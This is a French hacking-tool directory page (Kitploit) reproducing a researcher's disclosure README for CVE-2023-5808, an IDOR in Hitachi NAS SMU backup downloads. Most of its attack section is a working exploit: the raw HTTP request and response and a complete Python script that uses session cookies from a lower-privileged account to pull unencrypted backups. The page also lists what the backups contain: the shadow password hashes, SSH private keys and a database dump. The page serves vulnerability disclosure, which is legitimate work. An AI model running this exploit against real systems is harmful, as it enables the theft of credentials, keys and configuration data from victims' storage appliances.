Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-5808 — Exploit pour CVE-2023-5808, une IDOR dans Hitachi NAS SMU Backup & Restore, permettant le téléchargement non autorisé de sauvegardes de configuration sensibles. | Kitploit
Outils/GitHubGitHub/arszilla/cve-2023-5808
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsTests d'Intrusion
GitHubarszilla/cve-2023-5808

CVE-2023-5808

Exploit pour CVE-2023-5808, une IDOR dans Hitachi NAS SMU Backup & Restore, permettant le téléchargement non autorisé de sauvegardes de configuration sensibles.

Voir le dépôt
21il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-5808

CVE-2023-5808 est une vulnérabilité de type Insecure Direct Object Reference (IDOR) présente dans la fonctionnalité Backup & Restore de l'unité de gestion système (SMU) des NAS Hitachi (HNAS). Cette vulnérabilité affecte les versions du SMU antérieures à 14.8.7825.01.

Exploitation

Cet exploit nécessite que l'attaquant contrôle les identifiants d'un compte utilisateur qui n'est ni Read-Only ni Global Administrator, c'est-à-dire :

  • Storage Administrator
  • Server Administrator
  • Server + Storage Administrator
  • Par conception, les utilisateurs disposant du rôle Global Administrator devraient pouvoir accéder à la fonctionnalité Backup & Restore du SMU, située à https://<HOSTNAME/FQDN/IP>/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored et envoyer la requête suivante, qui créerait et téléchargerait une sauvegarde (non chiffrée / sans mot de passe) :

    root@kitploit:~
    GET /mgr/app/template/simple%2CBackupSmuScreen.vm/password/ HTTP/1.1
    Host: REDACTED
    Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Dnt: 1
    Referer: https://REDACTED/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    Connection: close
    
    

    Si la requête réussit, le SMU répond avec la réponse suivante et lance le téléchargement de smu_2023-04-12_1543+0200.zip :

    root@kitploit:~
    HTTP/1.1 200 
    Cache-Control: PRIVATE
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Strict-Transport-Security: max-age=31536000;includeSubDomains
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
    Pragma: cache
    Content-Disposition: attachment;filename=smu_2023-04-12_1543+0200.zip
    Content-Type: application/download
    Content-Length: 1831412
    Date: Wed, 12 Apr 2023 13:43:15 GMT
    Connection: close
    Server: SMU
    
    [DATA]
    

    Cependant, en raison d'une omission dans la logique métier du SMU, un attaquant ayant accès à un compte Storage Administrator, Server Administrator ou Server + Storage Administrator peut mettre à jour les cookies JSESSIONID et JSESSIONIDSSO pour correspondre aux cookies de l'utilisateur qu'il possède, ce qui lui permet de télécharger l'archive de sauvegarde.

    Ainsi, un script tel que CVE-2023-5808.py pourrait être utilisé pour exploiter cette vulnérabilité :

    root@kitploit:~
    #!/usr/bin/python3
    #
    # Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability 
    # CVE:              CVE-2023-5808
    # Date:             2023-12-13
    # Exploit Author:   Arslan Masood (@arszilla)
    # Vendor:           https://www.hitachivantara.com/
    # Version:          < 14.8.7825.01
    # Tested On:        13.9.7021.04        
    
    import argparse
    from datetime import datetime
    from os import getcwd
    
    import requests
    
    parser = argparse.ArgumentParser(
        description="CVE-2023-5808 PoC",
        usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
        )
    
    # Create --host argument:
    parser.add_argument(
        "--host",
        required=True,
        type=str,
        help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
        )
    
    # Create --id argument:
    parser.add_argument(
        "--id",
        required=True,
        type=str,
        help="JSESSIONID cookie value"
        )
    
    # Create --sso argument:
    parser.add_argument(
        "--sso",
        required=True,
        type=str,
        help="JSESSIONIDSSO cookie value"
        )
    
    args = parser.parse_args()
    
    def download_file(hostname, jsessionid, jsessionidsso):
        # Set the filename:
        filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"
    
        # Vulnerable SMU URL:
        smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"
    
        # GET request cookies
        smu_cookies = {
            "JSESSIONID":       jsessionid,
            "JSESSIONIDSSO":    jsessionidsso
            }
    
        # GET request headers:
        smu_headers = {
            "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
            "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language":              "en-US,en;q=0.5",
            "Accept-Encoding":              "gzip, deflate",
            "Dnt":                          "1",
            "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
            "Upgrade-Insecure-Requests":    "1",
            "Sec-Fetch-Dest":               "document",
            "Sec-Fetch-Mode":               "navigate",
            "Sec-Fetch-Site":               "same-origin",
            "Sec-Fetch-User":               "?1",
            "Te":                           "trailers",
            "Connection":                   "close"
            }
    
        # Send the request:
        with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
            with open(filename, 'wb') as backup_archive:
                # Write the zip file to the CWD:
                backup_archive.write(file_download.content)
    
        print(f"{filename} has been downloaded to {getcwd()}")
    
    if __name__ == "__main__":
        download_file(args.host, args.id, args.sso)
    

    La justification du score CVSS v3.1 de 7.6 peut être mieux comprise en examinant le contenu de smu_2023-04-12_1543+0200.zip :

    root@kitploit:~
    $ tree -a
    .
    ├── adc_replic
    │   ├── backup.properties
    │   ├── mig_policies
    │   │   ├── MIGR_TEST_POL
    │   │   │   ├── 1
    │   │   │   │   ├── config
    │   │   │   │   └── lockfile
    │   │   │   ├── config
    │   │   │   └── lockfile
    │   │   └── next_schedule
    │   ├── mig_rules
    │   │   └── MIGR_TEST
    │   ├── pkgHandler.xml
    │   ├── replic_policies
    │   ├── replic_rules
    │   ├── replic_schedules
    │   │   └── next_schedule
    │   └── replic_scripts
    ├── backup.properties
    ├── mgr
    │   ├── axalon.properties
    │   ├── backup.properties
    │   ├── banner.txt.disabled
    │   ├── managedservers.json
    │   ├── pkgHandler.xml
    │   ├── systemmonitor_1.xml
    │   ├── systemmonitor_2.xml
    │   └── systemmonitor_3.xml
    ├── network
    │   └── yp.conf
    ├── postgresql
    │   ├── backup.properties
    │   ├── config_pgdump.tar
    │   ├── pkgHandler.xml
    │   └── rolledupstats_pgdump.tar
    ├── quorumdev2
    │   ├── backup.properties
    │   ├── CB-HNAS1-CLU
    │   │   └── cluster.conf
    │   ├── HH-HNAS1-CLU
    │   │   └── cluster.conf
    │   └── quorumdev2.conf
    ├── quorumdevice
    │   └── backup.properties
    ├── readyToShip
    │   ├── backup.properties
    │   ├── pkgHandler.xml
    │   ├── ssh_host_dsa_key
    │   ├── ssh_host_dsa_key.pub
    │   ├── ssh_host_key
    │   ├── ssh_host_key.pub
    │   ├── ssh_host_rsa_key
    │   └── ssh_host_rsa_key.pub
    ├── server-tools
    │   ├── backup.properties
    │   ├── ldap.conf.rb
    │   ├── massage-commands-for-managed-servers
    │   ├── ypcat-group
    │   └── ypcat-passwd
    ├── smu_users
    │   ├── backup.properties
    │   ├── manager
    │   │   └── ssh
    │   │       └── known_hosts
    │   ├── pkgHandler.xml
    │   ├── root
    │   │   └── ssh
    │   │       └── known_hosts
    │   └── shadow
    └── tomcat
        ├── backup.properties
        ├── nas.keystore
        └── pkgHandler.xml
    
    25 directories, 49 files
    

    L'archive .zip contient divers fichiers concernant la configuration du SMU. Les fichiers inclus sont (sans s'y limiter) :

    • le fichier /etc/shadow du SMU, contenant les hachages des mots de passe CLI de chaque utilisateur,
    • les clés privées PEM DSA, PEM RSA et OpenSSH RSA1,
    • la sauvegarde de la base de données PostgreSQL.

    Remarques

    Cette vulnérabilité est une « vulnérabilité sœur » de CVE-2023-6538.

    Références

    • CVE-2023-5808
    • CVE-2023-6538
    • Hitachi Vantara Security Bulletin pour CVE-2023-5808

    Chronologie

    • 2020-04-12 - Découverte de la vulnérabilité
    • 2023-04-20 - Signalement de la vulnérabilité à [email protected]
    • 2023-08-11 - Attribution initiale du numéro CVE
    • 2023-12-06 - Réattribution des numéros CVE
    • 2023-12-11 - Réattribution des numéros CVE
    • 2023-12-11 - Publication du CVE
    • 2023-12-13 - Divulgation publique
    Télécharger l’outil